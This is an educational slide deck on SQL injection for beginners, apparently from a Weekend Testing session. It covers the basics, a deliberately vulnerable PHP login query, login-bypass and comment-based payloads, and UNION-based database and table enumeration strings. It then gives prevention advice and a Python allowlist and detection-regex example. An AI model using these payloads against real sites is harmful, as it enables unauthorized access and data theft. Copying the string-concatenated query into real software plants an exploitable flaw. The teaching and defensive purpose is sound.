SQL Injection (a.k.a. SQLi)

  

Abhinav Sejpal



Who am I


Abhinav Sejpal 




Disclaimer


  • This presentation is intended for educational purposes only, and I cannot be held liable for any kind of damage done whatsoever to your machine, or other damages.
  • Please don't try this attack on any other system without context knowledge or permission; this may harm someone directly or indirectly.
  • Feel free to use this presentation for practice or educational purposes.


^ I hope - You gotcha ^

Agenda


  •  Basics of web applications
  •  What is SQL injection
  •  Basic SQL injection vectors & how to test
  •  Proof of concept (demo)
  •  Prevention of SQL injection attacks
  •  Q & A


Social Media feed


Hashtag for this session

     #WTBNT12 , #SQLi , #SQLinjection


Twitter handles for feedback:

 @weekendtesting  @Abhinav_Sejpal


G+ https://plus.google.com/events/c1hkhlb3tkmmrc0ikkr5r2sgji0

How the Web works


HTTP Header Flow


 Tamper with a Google HTTP request!


So, I have questions:

  • Does the user input go through any validation in the user's web browser?
  • Does the business logic verify the user input on the server side?


If your answer is 'No', then be ready to meet the 'Nightmare'.



Conclusion


Modern websites rely on user input for everything.
They are basically applications that expect various kinds of input from users in order to function a certain way.


 ~ Courtesy   ~



I AM that bad input

' SQL Injection ' 



What is SQL?


SQL stands for Structured Query Language.


  • Execute queries against a database
  • Retrieve data from a database
  • Insert new records in a database
  • Delete records from a database
  • In short, all DB operations :)


 User input? Aha


What if this works? Umm


It's me, SQL Injection

  • People also call me SQLi

  • 'Yes' - I have been a bottleneck for developers for many years

  • I am listed in the OWASP Top 10 vulnerabilities (2013)

  • Smart geeks pick me, send me in along with the user input & perform the attack.

History of attacks via SQLi


  •  SQL injection was responsible for 83% of all successful hacking-related data breaches from 2005 to 2011.

    (source: Privacyrights.org)


  • Automation infects 100,000s: in 2008, SQLi attacks became automated via the use of botnets. Mass website infection incidents include 500,000 reported in 2008, 210,000 in 2009, 500,000 in 2010, and 380,000 in 2011.



SQLi facts


  • Dominant source of attack: 97 percent of data breaches worldwide are due to SQL injection.
    (source: National Fraud Authority UK)


  • Web application risk: SQL injection was the leading web application risk of 2011. It ranks as one of the most common software vulnerabilities in survey after survey.
    (source: Trustwave)


Myth


SQLi is an old-days problem - I shouldn't worry about it.

^^

I am using a modern Java / PHP / Ruby / ASP framework:

CakePHP
Struts 2
Spring
GWT (Google Web Toolkit)
ESAPI


Latest SQL Injection Campaign Infects 1 Million Web Pages


Yahoo Hit By SQL Injection Attack


SQL injection flaw in Wall Street Journal database led to breach


SQL injection isn't going anywhere  <3


Error-Based SQLi


Demo

http://sqli.cyberwebdeveloper.com/index.php

Concept

Basic SQL query for a login page:

SELECT * FROM users where username="username" AND password = "pass"


Basic PHP statement for a login page (the query string as the deck builds it, by concatenating the raw user name into the SQL text):

$query = "SELECT * FROM users WHERE username='" . $username . "' AND password='" . md5($pass) . "'";


* md5() is applied to the password before it goes into the query (the slide calls this encryption; MD5 is a hash function, and the point here is that the password field never reaches the SQL text as typed).

       * Demo in SQL *

Cheat sheet


# Attack 1


SELECT * FROM `users` WHERE `username` ='admin' or '1'='1' and password ='I dont know'


Injection code:

admin' or '1'='1


Why?

Attack 1 relies on the 'User name' field:


SELECT * FROM `users` WHERE `username` ='admin' or '1'='1' and password ='I dont know'


AND binds tighter than OR, so the WHERE clause reads username='admin' OR ('1'='1' AND password='...'). The password check fails, so the row is matched only through username='admin'.

This attack can't be performed via the password field, because that input is passed through md5() before it reaches the query.

User name = anything' or '1' ='1

password = anything' or '1'='1


* A known user name is mandatory here *

Learnings from attack 1


The user name is known, i.e. 'admin'

  •  Append the SQL statement to the user name
  • <It simply works>

But you can't perform this attack if the user name

Comments-based SQLi

http://dev.mysql.com/doc/refman/5.1/en/comments.html


# : single-line comment

"-- " : from the sequence to the end of the line

/* ... */ : block comment between the two sequences

Concept

Basic SQL query for a login page:

SELECT * FROM users where username="username" AND password = "pass"


What if I insert a comment into the first attack?

SELECT * FROM users where username="admin" or '1' ='1' # AND password = "pass"


<< AND password = "pass" >> doesn't execute at all

If you get me - the attack doesn't require the user name now:


SELECT * FROM users where username="admin" or '1' ='1' # AND password = "pass"


The SQL statement will always be true due to '1' = '1', so it doesn't matter whether you know the user name or not.


Yes - I am done. But what if '#' is not a valid input?

(-- ) works for you, buddy!

* "--" followed by a space is the syntax


admin' or '1' = '1' --        : False (no space after --)

admin' or '1' = '1' --(space) : True


Most people forget to add the space, so I use the vector below:

admin' or '1' = '1' -- space + any one character

E.g. > admin' or '1' = '1' -- Sandy

So, what do you think,

SQL is all about 1=1?

ssshhh - do you hear that? - NO

Dump sensitive DB info


* Identify how many columns get selected.

* Identify which column of the result set is displayed on the page.


a%' union select 1,2,3,4,5 from users #


a%' union select 1,@@datadir,2,3,4 from users #

a%' union select 1,@@version,3,4,5 from users #



Database enumeration


a%' union select 1,table_schema,2,3,4 from information_schema.tables #

Table enumeration

a%' union select 1,table_schema,table_name,3,4 from information_schema.tables #


a%' union select 1,table_schema,table_name,3,4 from information_schema.tables where table_schema='sqlhumla'#

How to prevent SQLi


• Whitelist input validation
• Least privilege for the DB user
• Escape all user-supplied input - don't trust user input
• Use stored procedures
• Use prepared statements (parameterized queries)
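Two items from the list above, whitelist input validation and not trusting user input, as an added Python example that is not part of the deck: an allowlist check for the login user name field, and a small scanner that looks for the deck's own vectors (the `' or '1'='1` tautology, the `#`, `-- ` and `/*` comment sequences, `union select`, and `information_schema` / `@@version` lookups) in web-server log lines, so a defender can spot the attempts described earlier. The allowlist pattern, the signature regexes and the log lines are all assumptions constructed for this example.

```python
import re
from urllib.parse import unquote_plus

# Allowlist for a login user name: letters, digits, dot, underscore, hyphen,
# 1 to 32 characters. Quotes, spaces and comment sequences never match, so the
# deck's payloads are rejected before any SQL text is built. (Assumed policy.)
USERNAME_RE = re.compile(r"^[A-Za-z0-9._-]{1,32}$")


def validate_username(value: str) -> bool:
    """True only if the value matches the allowlist exactly."""
    return USERNAME_RE.fullmatch(value) is not None


# Signatures derived from the vectors shown in the deck. Order matters only
# for the order of names in the scan result.
SQLI_SIGNATURES = [
    ("tautology", re.compile(r"'\s*or\s*'[^']*'\s*=\s*'", re.IGNORECASE)),
    ("comment", re.compile(r"(--\s|#|/\*)")),
    ("union", re.compile(r"\bunion\s+(all\s+)?select\b", re.IGNORECASE)),
    ("schema", re.compile(r"information_schema|@@(version|datadir)", re.IGNORECASE)),
]


def scan_request(line: str) -> list:
    """Return the names of the signatures that match one log line.

    The line is URL-decoded first, because the payload arrives percent-encoded
    in the query string (%27 for the quote, %23 for '#', and so on).
    """
    decoded = unquote_plus(line)
    return [name for name, rx in SQLI_SIGNATURES if rx.search(decoded)]


def scan_log(lines: list) -> list:
    """Return (line_number, matched_signatures) for every suspicious line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        matched = scan_request(line)
        if matched:
            hits.append((number, matched))
    return hits


# Constructed access-log lines (common log format, trimmed): one normal login
# and three requests carrying the deck's vectors, percent-encoded.
SAMPLE_LOG = [
    '10.0.0.5 - - "GET /index.php?username=admin&password=x HTTP/1.1" 200',
    '10.0.0.7 - - "GET /index.php?username=admin%27+or+%271%27%3D%271&password=x HTTP/1.1" 200',
    '10.0.0.7 - - "GET /index.php?username=anything%27+or+%271%27%3D%271%27+--+Sandy HTTP/1.1" 200',
    '10.0.0.9 - - "GET /search.php?q=a%25%27+union+select+1%2C%40%40version%2C3%2C4%2C5+from+users+%23 HTTP/1.1" 200',
]


if __name__ == "__main__":
    for number, matched in scan_log(SAMPLE_LOG):
        print(f"line {number}: {', '.join(matched)}")
```

The allowlist is the stronger of the two controls: it rejects the deck's payloads outright, and it does not need to know every SQL dialect's comment syntax. The log scanner is a detection aid, not a replacement for prepared statements; it only recognises the specific shapes the deck shows, and a benign value containing `#` would also trip the comment signature, so treat its output as something to review rather than block on.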


There is no silver bullet to stop this - just trust your code

~ Keep hacking your code ~

Good blogs



-- ^ Google, darling, search with #Sqlinjection ^--


Credits



- Twitter folks -
@BillKarwin , @riyazwalikar , @JosephMcCray , @sqlinjwiki
@TroyHunt , @yog3sharma , @makash & @anatshri

Big thank you to @weekendtesting , @srinivasskc & you all.

Yes - I'm done!


Feel free to write to me at bug.wrangler at outlook.com

License and Copyrights


https://slides.com/abhinavsejpal/sql-injection-for-beginners/

copyright 2013-2014 Abhinav Sejpal

-----

(CC BY-NC-ND 3.0)

Attribution-NonCommercial-NoDerivs 3.0 Unported

Dedicated to my lovely daddy



